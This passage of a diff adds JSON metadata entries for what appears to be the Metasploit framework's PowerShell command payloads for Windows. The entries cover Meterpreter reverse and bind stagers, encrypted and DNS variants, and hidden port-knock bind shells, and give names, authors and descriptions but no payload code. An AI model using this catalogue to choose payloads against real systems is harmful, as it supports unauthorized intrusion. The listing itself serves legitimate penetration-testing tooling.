"windows/bind_nonx_tcp" + }, + "payload_cmd/windows/powershell/meterpreter/bind_tcp": { + "name": "Powershell Exec, Bind TCP Stager (Windows x86)", + "fullname": "payload/cmd/windows/powershell/meterpreter/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves", + "hdm " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection (Windows x86)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/meterpreter/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/meterpreter/bind_tcp", + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/bind_tcp" + }, + "payload_cmd/windows/powershell/meterpreter/bind_tcp_rc4": { + "name": "Powershell Exec, Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/powershell/meterpreter/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves", + "hdm ", + "mihi", + "RageLtMan" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/meterpreter/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/meterpreter/bind_tcp_rc4", + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/bind_tcp_rc4" + }, + "payload_cmd/windows/powershell/meterpreter/bind_tcp_uuid": { + "name": "Powershell Exec, Bind TCP Stager with UUID Support (Windows x86)", + "fullname": "payload/cmd/windows/powershell/meterpreter/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves", + "hdm " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection with UUID Support (Windows x86)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/meterpreter/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/meterpreter/bind_tcp_uuid", + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/bind_tcp_uuid" + }, + "payload_cmd/windows/powershell/meterpreter/find_tag": { + "name": "Powershell Exec, Find Tag Ordinal Stager", + "fullname": "payload/cmd/windows/powershell/meterpreter/find_tag", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nUse an established connection", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/meterpreter/find_tag", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/meterpreter/find_tag", + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/findtag_ord" + }, + "payload_cmd/windows/powershell/meterpreter/reverse_http": { + "name": "Powershell Exec, Windows Reverse HTTP Stager (wininet)", + "fullname": "payload/cmd/windows/powershell/meterpreter/reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves", + "hdm " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nTunnel communication over HTTP (Windows wininet)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/meterpreter/reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/meterpreter/reverse_http", + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/reverse_http" + }, + "payload_cmd/windows/powershell/meterpreter/reverse_http_proxy_pstore": { + "name": "Powershell Exec, Reverse HTTP Stager Proxy", + "fullname": "payload/cmd/windows/powershell/meterpreter/reverse_http_proxy_pstore", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves", + "hdm " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nTunnel communication over HTTP", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/meterpreter/reverse_http_proxy_pstore", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/meterpreter/reverse_http_proxy_pstore", + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/reverse_http_proxy_pstore" + }, + "payload_cmd/windows/powershell/meterpreter/reverse_https": { + "name": "Powershell Exec, Windows Reverse HTTPS Stager (wininet)", + "fullname": "payload/cmd/windows/powershell/meterpreter/reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves", + "hdm " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nTunnel communication over HTTPS (Windows wininet)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/meterpreter/reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/meterpreter/reverse_https", + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/reverse_https" + }, + "payload_cmd/windows/powershell/meterpreter/reverse_ipv6_tcp": { + "name": "Powershell Exec, Reverse TCP Stager (IPv6)", + "fullname": "payload/cmd/windows/powershell/meterpreter/reverse_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves", + "hdm " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker over IPv6", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/meterpreter/reverse_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/meterpreter/reverse_ipv6_tcp", + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/reverse_ipv6_tcp" + }, + "payload_cmd/windows/powershell/meterpreter/reverse_named_pipe": { + "name": "Powershell Exec, Windows x86 Reverse Named Pipe (SMB) Stager", + "fullname": "payload/cmd/windows/powershell/meterpreter/reverse_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker via a named pipe pivot", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/meterpreter/reverse_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/meterpreter/reverse_named_pipe", + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/reverse_named_pipe" + }, + "payload_cmd/windows/powershell/meterpreter/reverse_nonx_tcp": { + "name": "Powershell Exec, Reverse TCP Stager (No NX or Win7)", + "fullname": "payload/cmd/windows/powershell/meterpreter/reverse_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves", + "vlad902 " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker (No NX)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/meterpreter/reverse_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/meterpreter/reverse_nonx_tcp", + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/reverse_nonx_tcp" + }, + "payload_cmd/windows/powershell/meterpreter/reverse_ord_tcp": { + "name": "Powershell Exec, Reverse Ordinal TCP Stager (No NX or Win7)", + "fullname": "payload/cmd/windows/powershell/meterpreter/reverse_ord_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves", + "spoonm " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/meterpreter/reverse_ord_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/meterpreter/reverse_ord_tcp", + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/reverse_ord_tcp" + }, + "payload_cmd/windows/powershell/meterpreter/reverse_tcp": { + "name": "Powershell Exec, Reverse TCP Stager", + "fullname": "payload/cmd/windows/powershell/meterpreter/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves", + "hdm " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/meterpreter/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/meterpreter/reverse_tcp", + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/reverse_tcp" + }, + "payload_cmd/windows/powershell/meterpreter/reverse_tcp_allports": { + "name": "Powershell Exec, Reverse All-Port TCP Stager", + "fullname": "payload/cmd/windows/powershell/meterpreter/reverse_tcp_allports", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves", + "hdm " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/meterpreter/reverse_tcp_allports", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/meterpreter/reverse_tcp_allports", + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/reverse_tcp_allports" + }, + "payload_cmd/windows/powershell/meterpreter/reverse_tcp_dns": { + "name": "Powershell Exec, Reverse TCP Stager (DNS)", + "fullname": "payload/cmd/windows/powershell/meterpreter/reverse_tcp_dns", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves", + "hdm ", + "RageLtMan" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/meterpreter/reverse_tcp_dns", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/meterpreter/reverse_tcp_dns", + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/reverse_tcp_dns" + }, + "payload_cmd/windows/powershell/meterpreter/reverse_tcp_rc4": { + "name": "Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/powershell/meterpreter/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves", + "hdm ", + "mihi", + "RageLtMan" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/meterpreter/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/meterpreter/reverse_tcp_rc4", + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/reverse_tcp_rc4" + }, + "payload_cmd/windows/powershell/meterpreter/reverse_tcp_rc4_dns": { + "name": "Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", + "fullname": "payload/cmd/windows/powershell/meterpreter/reverse_tcp_rc4_dns", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves", + "hdm ", + "mihi", + "RageLtMan" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/meterpreter/reverse_tcp_rc4_dns", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/meterpreter/reverse_tcp_rc4_dns", + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/reverse_tcp_rc4_dns" + }, + "payload_cmd/windows/powershell/meterpreter/reverse_tcp_uuid": { + "name": "Powershell Exec, Reverse TCP Stager with UUID Support", + "fullname": "payload/cmd/windows/powershell/meterpreter/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves", + "hdm " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker with UUID Support", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/meterpreter/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/meterpreter/reverse_tcp_uuid", + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/reverse_tcp_uuid" + }, + "payload_cmd/windows/powershell/meterpreter/reverse_winhttp": { + "name": "Powershell Exec, Windows Reverse HTTP Stager (winhttp)", + "fullname": "payload/cmd/windows/powershell/meterpreter/reverse_winhttp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves", + "hdm ", + "Borja Merino " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nTunnel communication over HTTP (Windows winhttp)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/meterpreter/reverse_winhttp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/meterpreter/reverse_winhttp", + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/reverse_winhttp" + }, + "payload_cmd/windows/powershell/meterpreter/reverse_winhttps": { + "name": "Powershell Exec, Windows Reverse HTTPS Stager (winhttp)", + "fullname": "payload/cmd/windows/powershell/meterpreter/reverse_winhttps", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves", + "hdm ", + "Borja Merino " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nTunnel communication over HTTPS (Windows winhttp)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/meterpreter/reverse_winhttps", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/meterpreter/reverse_winhttps", + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/reverse_winhttps" + }, + "payload_cmd/windows/powershell/metsvc_bind_tcp": { + "name": "Powershell Exec, Windows Meterpreter Service, Bind TCP", + "fullname": "payload/cmd/windows/powershell/metsvc_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "hdm " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nStub payload for interacting with a Meterpreter Service", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/metsvc_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/metsvc_bind_tcp", + "staged": false + }, + "payload_cmd/windows/powershell/metsvc_reverse_tcp": { + "name": "Powershell Exec, Windows Meterpreter Service, Reverse TCP Inline", + "fullname": "payload/cmd/windows/powershell/metsvc_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "hdm " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nStub payload for interacting with a Meterpreter Service", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/metsvc_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/metsvc_reverse_tcp", + "staged": false + }, + "payload_cmd/windows/powershell/patchupdllinject/bind_hidden_ipknock_tcp": { + "name": "Powershell Exec, Hidden Bind Ipknock TCP Stager", + "fullname": "payload/cmd/windows/powershell/patchupdllinject/bind_hidden_ipknock_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "jt ", + "skape ", + "hdm ", + "sf ", + "Borja Merino " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode", + "references": [ + "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/patchupdllinject/bind_hidden_ipknock_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/patchupdllinject/bind_hidden_ipknock_tcp", + "staged": true, + "stage_refname": "windows/patchupdllinject", + "stager_refname": "windows/bind_hidden_ipknock_tcp" + }, + "payload_cmd/windows/powershell/patchupdllinject/bind_hidden_tcp": { + "name": "Powershell Exec, Hidden Bind TCP Stager", + "fullname": "payload/cmd/windows/powershell/patchupdllinject/bind_hidden_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "jt ", + "skape ", + "hdm ", + "sf ", + "Borja Merino " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.", + "references": [ + "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/patchupdllinject/bind_hidden_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/patchupdllinject/bind_hidden_tcp", + "staged": true, + "stage_refname": "windows/patchupdllinject", + "stager_refname": "windows/bind_hidden_tcp" + }, + "payload_cmd/windows/powershell/patchupdllinject/bind_ipv6_tcp": { + "name": "Powershell Exec, Bind IPv6 TCP Stager (Windows x86)", + "fullname": "payload/cmd/windows/powershell/patchupdllinject/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "jt ", + "skape ", + "hdm ", + "sf " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for an IPv6 connection (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/patchupdllinject/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/patchupdllinject/bind_ipv6_tcp", + "staged": true, + "stage_refname": "windows/patchupdllinject", + "stager_refname": "windows/bind_ipv6_tcp" + }, + 